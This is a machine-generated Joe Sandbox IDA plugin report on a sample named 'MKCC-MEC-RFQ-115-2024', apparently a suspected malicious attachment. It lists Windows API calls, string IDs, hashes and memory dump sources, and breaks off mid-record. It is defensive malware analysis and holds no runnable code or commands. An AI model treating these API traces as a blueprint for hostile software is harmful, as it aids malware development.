                                              • Opcode ID: 2e71865d99cb2b626998e5d4d67c1ed4fddaa2cd89c2fa7553321dea08221e69
                                              • Instruction ID: 567bd780c3a29a7a545862369fa05fd6605b1ccd3812522a9c4ca40722919ee4
                                              • Opcode Fuzzy Hash: 2e71865d99cb2b626998e5d4d67c1ed4fddaa2cd89c2fa7553321dea08221e69
                                              • Instruction Fuzzy Hash: 8631B47050421ADFCF10EF94DD819EEB3B5FF15310B148A29E875AB6D2CB71A909CB90
                                              APIs
                                                • Part of subcall function 000E1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000E1D73
                                                • Part of subcall function 000E1D35: GetStockObject.GDI32(00000011), ref: 000E1D87
                                                • Part of subcall function 000E1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 000E1D91
                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 001666D0
                                              • LoadLibraryW.KERNEL32(?), ref: 001666D7
                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 001666EC
                                              • DestroyWindow.USER32(?), ref: 001666F4
                                              Strings
                                              Similarity
                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                              • String ID: SysAnimate32
                                              • API String ID: 4146253029-1011021900
                                              • Opcode ID: a717f95e0b5364673c40077597ad2e2314cfe37baa6f8b7329caa47c84e450a1
                                              • Instruction ID: 6d3d5116a3444d3a69de760035f0ae11172098c2ed53470b5a5cd8c0fbc2e3ab
                                              • Opcode Fuzzy Hash: a717f95e0b5364673c40077597ad2e2314cfe37baa6f8b7329caa47c84e450a1
                                              • Instruction Fuzzy Hash: E6216DB1200206AFEF104F68EC80EBB77ADEB59368F514629F911921A0D7B1DCA19761
                                              APIs
                                              • GetStdHandle.KERNEL32(0000000C), ref: 0014705E
                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00147091
                                              • GetStdHandle.KERNEL32(0000000C), ref: 001470A3
                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 001470DD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CreateHandle$FilePipe
                                              • String ID: nul
                                              • API String ID: 4209266947-2873401336
                                              • Opcode ID: e792711d9c1c5ae0e2c6f332a57cd11b9fadc7300bdfe9561108160e0fc20b38
                                              • Instruction ID: 05baf716477c0781c5f8ddc97a51fe3cda228a7e2aacc92d4feaaddc991f8aaf
                                              • Opcode Fuzzy Hash: e792711d9c1c5ae0e2c6f332a57cd11b9fadc7300bdfe9561108160e0fc20b38
                                              • Instruction Fuzzy Hash: F2219074505309ABDF209F78DC05A9AB7B8BF56724F204A19FCA0D72E0E7B0D841CB51
                                              APIs
                                              • GetStdHandle.KERNEL32(000000F6), ref: 0014712B
                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0014715D
                                              • GetStdHandle.KERNEL32(000000F6), ref: 0014716E
                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 001471A8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CreateHandle$FilePipe
                                              • String ID: nul
                                              • API String ID: 4209266947-2873401336
                                              • Opcode ID: f57a0e7c7ba8f6de2ea3b439144f0315872175828edd7dd33e62c718732c1b9f
                                              • Instruction ID: 10773f695a4f596a975591b8a8dbeb1f966cedf98004dd27b03ad39c41d12155
                                              • Opcode Fuzzy Hash: f57a0e7c7ba8f6de2ea3b439144f0315872175828edd7dd33e62c718732c1b9f
                                              • Instruction Fuzzy Hash: 6C216275604316ABDF209F689C04AAAB7E8AF55B34F200A1DFDB1D72E0D7B09845CB61
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 0014AEBF
                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0014AF13
                                              • __swprintf.LIBCMT ref: 0014AF2C
                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,0016F910), ref: 0014AF6A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ErrorMode$InformationVolume__swprintf
                                              • String ID: %lu
                                              • API String ID: 3164766367-685833217
                                              • Opcode ID: 7d7f6f2de7527498961122f08a0e0ba09d7cc8bf5c1c3b48ae73a80ba6093da5
                                              • Instruction ID: 349157cedb40fcea2b0b687473e8c3f73cf5f794c14fa212805dd1946979deca
                                              • Opcode Fuzzy Hash: 7d7f6f2de7527498961122f08a0e0ba09d7cc8bf5c1c3b48ae73a80ba6093da5
                                              • Instruction Fuzzy Hash: C9214430600149AFCB10DF65DD85DEE77B8EF49704B104069F909EB252DB71EA45CB61
                                              APIs
                                                • Part of subcall function 000E7D2C: _memmove.LIBCMT ref: 000E7D66
                                                • Part of subcall function 0013A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0013A399
                                                • Part of subcall function 0013A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0013A3AC
                                                • Part of subcall function 0013A37C: GetCurrentThreadId.KERNEL32 ref: 0013A3B3
                                                • Part of subcall function 0013A37C: AttachThreadInput.USER32(00000000), ref: 0013A3BA
                                              • GetFocus.USER32 ref: 0013A554
                                                • Part of subcall function 0013A3C5: GetParent.USER32(?), ref: 0013A3D3
                                              • GetClassNameW.USER32(?,?,00000100), ref: 0013A59D
                                              • EnumChildWindows.USER32(?,0013A615), ref: 0013A5C5
                                              • __swprintf.LIBCMT ref: 0013A5DF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                              • String ID: %s%d
                                              • API String ID: 1941087503-1110647743
                                              • Opcode ID: f90ddea5f6f14a493d6ae5b30300ab49d628f44ea34a87412ef6689990ace5a2
                                              • Instruction ID: 4bef875dfe8e52ea4c9a6414b4e59666c5465d3d809f7a68ed9cc83f9c1dac44
                                              • Opcode Fuzzy Hash: f90ddea5f6f14a493d6ae5b30300ab49d628f44ea34a87412ef6689990ace5a2
                                              • Instruction Fuzzy Hash: EA11A2B12442086BDF10BF65EC8AFEA3778AF48700F044079F948AA153CB7159468B75
                                              APIs
                                              • CharUpperBuffW.USER32(?,?), ref: 00142048
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: BuffCharUpper
                                              • String ID: APPEND$EXISTS$KEYS$REMOVE
                                              • API String ID: 3964851224-769500911
                                              • Opcode ID: a77ed707fea46cb965c16e4ab67148f5129b3a506375e267ad7514089b4ecfda
                                              • Instruction ID: 9034b4cdaa7994205a2bbd6e231f19882d1817254be78cd71603af32d06bdfb8
                                              • Opcode Fuzzy Hash: a77ed707fea46cb965c16e4ab67148f5129b3a506375e267ad7514089b4ecfda
                                              • Instruction Fuzzy Hash: FE116130900109CFCF00EFA4D9415FEB7F4FF25304F908468E855672A2EB72590ACB50
                                              APIs
                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0015EF1B
                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0015EF4B
                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0015F07E
                                              • CloseHandle.KERNEL32(?), ref: 0015F0FF
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                              • String ID:
                                              • API String ID: 2364364464-0
                                              • Opcode ID: 5e933ffc982aa8df4f580cff92c7a1c379f211ec793d315db64804b182505ffd
                                              • Instruction ID: 7b2e9e50ab0b604f05b9c528f615ab27b08a41de8b2c45df99b1d79f63dbae89
                                              • Opcode Fuzzy Hash: 5e933ffc982aa8df4f580cff92c7a1c379f211ec793d315db64804b182505ffd
                                              • Instruction Fuzzy Hash: BE8163B16043009FD724DF29CC86F6AB7E5AF48710F14882DF999EB392DB70AD458B91
                                              APIs
                                                • Part of subcall function 000E7F41: _memmove.LIBCMT ref: 000E7F82
                                                • Part of subcall function 001610A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00160038,?,?), ref: 001610BC
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00160388
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001603C7
                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0016040E
                                              • RegCloseKey.ADVAPI32(?,?), ref: 0016043A
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00160447
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                              • String ID:
                                              • API String ID: 3440857362-0
                                              • Opcode ID: 05eb21a84451da7171f1817e6c8fd29e4084939e64d09548f6af411cb52a09cc
                                              • Instruction ID: 5cfb80184df269a85b42024743f3b93681f8e165b45336d94699c892dd3bca21
                                              • Opcode Fuzzy Hash: 05eb21a84451da7171f1817e6c8fd29e4084939e64d09548f6af411cb52a09cc
                                              • Instruction Fuzzy Hash: 55514531208244AFD705EB65DC81EAFB7E8FF88304F04892DF596972A2DB70E915CB52
                                              APIs
                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0014E88A
                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0014E8B3
                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0014E8F2
                                                • Part of subcall function 000E9997: __itow.LIBCMT ref: 000E99C2
                                                • Part of subcall function 000E9997: __swprintf.LIBCMT ref: 000E9A0C
                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0014E917
                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0014E91F
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                              • String ID:
                                              • API String ID: 1389676194-0
                                              • Opcode ID: 35b6e6429664d0b4cb5f74af14aae2cd76e053369fda1788a21fafb29befd887
                                              • Instruction ID: 8d7e5fc4e4fe45ca0a6dd19e1b56b68cb42ee69ddc11a99c5d2e630943bec5ea
                                              • Opcode Fuzzy Hash: 35b6e6429664d0b4cb5f74af14aae2cd76e053369fda1788a21fafb29befd887
                                              • Instruction Fuzzy Hash: 76511935A00245EFCF01EF65C981AAEBBF5FF48314B1480A9E849AB362CB71ED51DB51
                                              APIs
                                              • GetCursorPos.USER32(?), ref: 000E2357
                                              • ScreenToClient.USER32(001A67B0,?), ref: 000E2374
                                              • GetAsyncKeyState.USER32(00000001), ref: 000E2399
                                              • GetAsyncKeyState.USER32(00000002), ref: 000E23A7
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: AsyncState$ClientCursorScreen
                                              • String ID:
                                              • API String ID: 4210589936-0
                                              • Opcode ID: 8e5f77def17503effdffcc2c4486677cde00ccf3566bd35bde5ff17d2c67df49
                                              • Instruction ID: beba93c98478b01daaf74bc46f9b55dc5779451a99247512f1aea466c687c2bf
                                              • Opcode Fuzzy Hash: 8e5f77def17503effdffcc2c4486677cde00ccf3566bd35bde5ff17d2c67df49
                                              • Instruction Fuzzy Hash: 05416D31504159FFDB199F69CC44AEEBBB8BB15320F20432AF829A2290C7745E94DF91
                                              APIs
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0013695D
                                              • TranslateAcceleratorW.USER32(?,?,?), ref: 001369A9
                                              • TranslateMessage.USER32(?), ref: 001369D2
                                              • DispatchMessageW.USER32(?), ref: 001369DC
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001369EB
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Message$PeekTranslate$AcceleratorDispatch
                                              • String ID:
                                              • API String ID: 2108273632-0
                                              • Opcode ID: 191ac08565aabdbe8128b1c0c16db3dd2d4312e33f0ae2649d5c744e964ccef1
                                              • Instruction ID: f8fba264872ff041191ee9cec5328be1343c760f16069e95b4ba29abd83712bf
                                              • Opcode Fuzzy Hash: 191ac08565aabdbe8128b1c0c16db3dd2d4312e33f0ae2649d5c744e964ccef1
                                              • Instruction Fuzzy Hash: 9B31D471904246BEDB25CF74DC44FB67BBCAB12308F18C16AE421D75A1D77498C9DBA0
                                              APIs
                                              • GetWindowRect.USER32(?,?), ref: 00138F12
                                              • PostMessageW.USER32(?,00000201,00000001), ref: 00138FBC
                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00138FC4
                                              • PostMessageW.USER32(?,00000202,00000000), ref: 00138FD2
                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00138FDA
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessagePostSleep$RectWindow
                                              • String ID:
                                              • API String ID: 3382505437-0
                                              • Opcode ID: ddb6b6c6618934b78549e7d27842567a8220951e0cb34bb1fb9ebd0aee41aa52
                                              • Instruction ID: 89fd29960859a0960aa910012b7ad14358ec0e78d05b0ce6dd398c0d98ffdb56
                                              • Opcode Fuzzy Hash: ddb6b6c6618934b78549e7d27842567a8220951e0cb34bb1fb9ebd0aee41aa52
                                              • Instruction Fuzzy Hash: 0131CC71500219EFDB14CFA8ED4CAAE7BBAFB05325F104229F925EB2D0C7B09954DB90
                                              APIs
                                                • Part of subcall function 000E2612: GetWindowLongW.USER32(?,000000EB), ref: 000E2623
                                              • GetWindowLongW.USER32(?,000000F0), ref: 0016B44C
                                              • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0016B471
                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0016B489
                                              • GetSystemMetrics.USER32(00000004), ref: 0016B4B2
                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00151184,00000000), ref: 0016B4D0
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Window$Long$MetricsSystem
                                              • String ID:
                                              • API String ID: 2294984445-0
                                              • Opcode ID: 746ba579ea177e26ab73cac704c828304f13f7e2b9e98e0950929cd3af7f94d9
                                              • Instruction ID: 2dc21c89613ef19e617eedcd1031852b1cd25871afcb1f239f6c515cf09972fd
                                              • Opcode Fuzzy Hash: 746ba579ea177e26ab73cac704c828304f13f7e2b9e98e0950929cd3af7f94d9
                                              • Instruction Fuzzy Hash: 2821A331518255AFCB149F38DC84A6A37A4FB05721F154738F927D35E2EB3098A1DB80
                                              APIs
                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000E134D
                                              • SelectObject.GDI32(?,00000000), ref: 000E135C
                                              • BeginPath.GDI32(?), ref: 000E1373
                                              • SelectObject.GDI32(?,00000000), ref: 000E139C
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ObjectSelect$BeginCreatePath
                                              • String ID:
                                              • API String ID: 3225163088-0
                                              • Opcode ID: 57de284d20983c035c909dfcb6372e11a00ec99fb307a99b034f8c92e1e11b9e
                                              • Instruction ID: 4370d6ab91741a9bbbcae29b82afb005e080facf06cc8c9888df2c8bfea65f51
                                              • Opcode Fuzzy Hash: 57de284d20983c035c909dfcb6372e11a00ec99fb307a99b034f8c92e1e11b9e
                                              • Instruction Fuzzy Hash: 6C213E71904344EFDB119F26EC047A97BFDEB01721F18822AF810A69A0D7B999D1DB90
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _memcmp
                                              • String ID:
                                              • API String ID: 2931989736-0
                                              • Opcode ID: 98aebc41c77f27fe587557f5cb05d660fcd2373d966eeb4104addc0083348a9e
                                              • Instruction ID: 05ec1a662c5d14a72c0860c3218e85a66cadb7f4ca8f5194200ec8b2ece86bad
                                              • Opcode Fuzzy Hash: 98aebc41c77f27fe587557f5cb05d660fcd2373d966eeb4104addc0083348a9e
                                              • Instruction Fuzzy Hash: 1101DD72A04209BBD214A5209C52F7B775C9F31394F048011FD08B7283EBE5DE11A3E0
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 00144D5C
                                              • __beginthreadex.LIBCMT ref: 00144D7A
                                              • MessageBoxW.USER32(?,?,?,?), ref: 00144D8F
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00144DA5
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00144DAC
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                              • String ID:
                                              • API String ID: 3824534824-0
                                              • Opcode ID: f58d77a9feec5b9368173336ce4cf54a72e67046df70e3ce8b8770c08b93e973
                                              • Instruction ID: 0400c090c813c05ffd22ba856ffe59c4a63d74bc4a728d6017321b5e1a5ff7d2
                                              • Opcode Fuzzy Hash: f58d77a9feec5b9368173336ce4cf54a72e67046df70e3ce8b8770c08b93e973
                                              • Instruction Fuzzy Hash: 2E1108B6D04248BBC7019FA8EC08BDA7FACEB56320F14426AF914D3661D7B18D8087A0
                                              APIs
                                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00138766
                                              • GetLastError.KERNEL32(?,0013822A,?,?,?), ref: 00138770
                                              • GetProcessHeap.KERNEL32(00000008,?,?,0013822A,?,?,?), ref: 0013877F
                                              • HeapAlloc.KERNEL32(00000000,?,0013822A,?,?,?), ref: 00138786
                                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0013879D
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
